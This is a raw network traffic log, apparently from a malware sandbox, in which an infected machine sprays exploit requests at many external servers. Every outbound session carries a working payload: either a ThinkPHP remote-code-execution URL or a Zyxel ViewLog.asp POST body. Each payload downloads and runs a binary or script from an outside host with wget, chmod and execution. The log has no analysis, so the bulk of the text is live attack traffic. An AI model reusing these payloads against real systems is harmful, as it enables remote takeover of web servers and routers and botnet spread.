Feb 14, 2024 09:31:16.444366932 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:16.677329063 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:31:16 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1052	192.168.2.15	42396	95.59.5.102	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:16.567678928 CET	391	IN	HTTP/1.1 400 Bad Request Server: micro_httpd Cache-Control: no-cache Date: Wed, 14 Feb 2024 11:31:15 GMT Content-Type: text/html Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1053	192.168.2.15	44922	85.72.47.66	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:16.711014032 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1054	192.168.2.15	57584	95.46.0.156	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:16.887660027 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:17.119755983 CET	59	IN	HTTP/1.1 400 Bad Request Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
1055	192.168.2.15	37698	95.164.45.248	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:16.904762983 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:17.101778030 CET	59	IN	HTTP/1.1 400 Bad Request Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
1056	192.168.2.15	37162	95.100.190.36	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:17.689596891 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:17.915997982 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:31:17 GMT Date: Wed, 14 Feb 2024 08:31:17 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 66 64 31 66 35 35 37 26 23 34 36 3b 31 37 30 37 38 39 39 34 37 37 26 23 34 36 3b 31 62 62 66 35 37 62 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.afd1f557.1707899477.1bbf57be</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1057	192.168.2.15	49860	95.100.149.42	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:17.899930954 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:18.110260963 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:31:18 GMT Date: Wed, 14 Feb 2024 08:31:18 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 36 61 35 37 31 64 34 26 23 34 36 3b 31 37 30 37 38 39 39 34 37 38 26 23 34 36 3b 33 32 34 61 37 31 31 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.96a571d4.1707899478.324a7115</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1058	192.168.2.15	36028	95.214.235.221	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:17.920886993 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:18.153096914 CET	450	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:31:18 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33 Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1059	192.168.2.15	7840	88.249.41.177	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:18.393924952 CET	32	IN	Data Raw: 28 52 65 66 2e 49 64 3a 20 3f 73 4b 66 76 6c 73 43 34 4d 34 61 32 57 38 50 61 43 34 7a 46 3f 29 Data Ascii: (Ref.Id: ?sKfvlsC4M4a2W8PaC4zF?)

Session ID	Source IP	Source Port	Destination IP	Destination Port
1060	192.168.2.15	42346	31.200.108.180	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:19.377882957 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1061	192.168.2.15	59628	95.34.243.143	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:19.604783058 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:20.791033983 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:22.166836023 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:25.078952074 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:30.710733891 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:41.718637943 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:32:05.269928932 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1062	192.168.2.15	46068	94.122.85.38	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:19.625919104 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1063	192.168.2.15	50174	94.122.49.145	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:19.627377987 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1064	192.168.2.15	46310	95.78.125.128	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:19.628093004 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:19.879460096 CET	224	IN	HTTP/1.1 403 Forbidden Content-Type: text/html; charset=utf-8 Content-Length: 106 Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1065	192.168.2.15	56622	112.187.12.111	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:20.467139959 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
1066	192.168.2.15	45872	94.110.203.79	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:22.127902031 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1067	192.168.2.15	53522	31.136.194.194	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:22.128042936 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:22.838927031 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:24.247174978 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:27.126837015 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:32.758577108 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:44.022444010 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
